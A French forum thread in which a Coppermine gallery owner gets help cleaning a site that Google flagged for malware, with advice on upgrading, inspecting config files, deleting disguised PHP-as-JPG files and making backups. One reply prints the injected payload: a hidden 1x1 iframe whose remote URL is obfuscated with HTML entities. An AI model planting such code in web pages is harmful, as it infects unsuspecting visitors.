[Solved]: Malware sur ma (mes ?) galeries, que faire ?

[TNZ]

Bonjour à tous,

Ci dessous un mail reçu par Google :

Dear site owner or webmaster of travelsteph.com,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below is an example URL on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://www.travelsteph .com/coppermineoz/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//www.travelsteph.com/coppermineoz/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites: http://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Que faire et comment le faire ? J'ai demandé à un copain qui m'a dit "désactive rapidement Coppermine et utilise ZenPhoto" mais... :?

Existe-t-il une autre solution me permettant de ne pas supprimer les galeries ?

Merci d'avance.

[Pascal YAP]

Votre Galerie contient ceci :

Code Select Expand

<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

Votre Galerie et tout votre site a été potentiellement infecté.

Lisez les Post-It que nous plaçons pour informer les Utilisateurs de Coppermine  et qui en général portent des titres très évocateurs :

CPG 1.4.18 Security release - Mise à jour OBLIGATOIRE !!!
http://forum.coppermine-gallery.net/index.php/topic,51891.0.html

PYAP

[TNZ]

Merci pour votre réponse.

Effectivement, j'aurai du mettre à jour plus tôt... Mais maintenant, comment supprimer ces malware (en plus de se protéger pour que ça ne recommence pas) ?

[Pascal YAP]

Mettez à jour votre Galerie vers 1.4.18
Scrutez votre fichier CONFIG.INC.PHP qui peut lui aussi peut être infecté.
Scrutez attentivement tous vos dossiers sous ALBUMS, et supprimez les fichiers de type ZIP vous paraissant suspects,
ainsi que certains fichiers JPG qui en réalité sont des PHP exécutable !.
Scrutez tous vos dossiers contenant du HTML et mettez à jours ces éventuels fichiers.

Bref comme indiqué dans le lien que j'ai donné ci-dessus.

PYAP

[TNZ]

J'avais la version 1.4.9...

J'ai supprimé un fichier ZIP et un .jpg dans les galeries et la je suis en train de faire l'update de 1.4.9 ==> 1.4.18. Mais...j'avoue que je me demande si je n'y suis pas allé un peu fort dans ma maniere de faire. A suivre...

Question pour mes autres galeries Coppermine : est-il possible de sauvegarder les photos par albums ? Car moi toutes les photos sont dans le meme dossier sur le serveur donc ce n'est pas super pratique pour faire une sauvegarde.

[Pascal YAP]

1/ Sauvegardez votre Base de Données.
2/ Sauvegardez le dossiers ALBUMS ainsi que ses sous-Dossiers.

3/ La manoeuvre inverse est aisée en cas de coup dur.
    Sans celà, il ne reste qu'à pleurer  :-\

PYAP

[TNZ]

Ok, merci.

Pour la galerie infectée et pour une autre (j'en ai 5 au total), voici ce que j'ai fais :
- Suppression des fichier ZIP et images douteuses dans albums/
- Sauvegarde de config.inc.php et check pour voir s'il y a des choses douteuses (pour l'instant, RAS)
- Suppression de tous les dossiers et fichiers (sauf le dossier albums auquel je ne touche pas)
- up de tous les dossiers et fichiers (sauf albums) de la version 1.4.18
- Je remets l'ancien fichier config.inc.php sur le serveur, dans include

Et voila, mes galeries refonctionnent et lorsque j'ouvre la console Configuration, c'est indiqué "Configuration de la galerie - Coppermine Photo Gallery 1.4.18 (stable)". Par contre, je ne touche pas aux fichiers qui sont dans le dossier album. Suis-je quand meme bien passé a la version 1.4.18 en intégralité ou j'ai raté des explications quelques part ?
Enfin, j'ai lu qu'il fallait sauvegarder anycontent.php mais mes galeries refonctionnent sans le remettre, est-ce normal ?

[TNZ]

J'ai oublié de préciser : j'ai up le fichier cure.php dans toutes mes installations Coppermine et j'ai vérifié pour chacune et tout était ok. En gros, la seule infection que j'avais était un fichier ZIP + une image dans le dossier albums. C'est étonnant ou ca tient la route ?

Merci encore pour votre aide 

[TNZ]

Voila, j'ai mis à jour mes 5 galeries Coppermine ; du moins, c'est ce que je crois et espère ! Existe-t-il un moyen de vérifier si elles sont bien à jour ?
Je vais maintenant voir si je reste du site à été infecté.

[François Keller]

a priori c'est bon, vérifiez en regardant le source de la page d'accueil pour voir si vous n'avez pas d'iframe malicieux qui reste

[TNZ]

Aucun iframe dans la page d'accueil du site

Merci à tous pour votre aide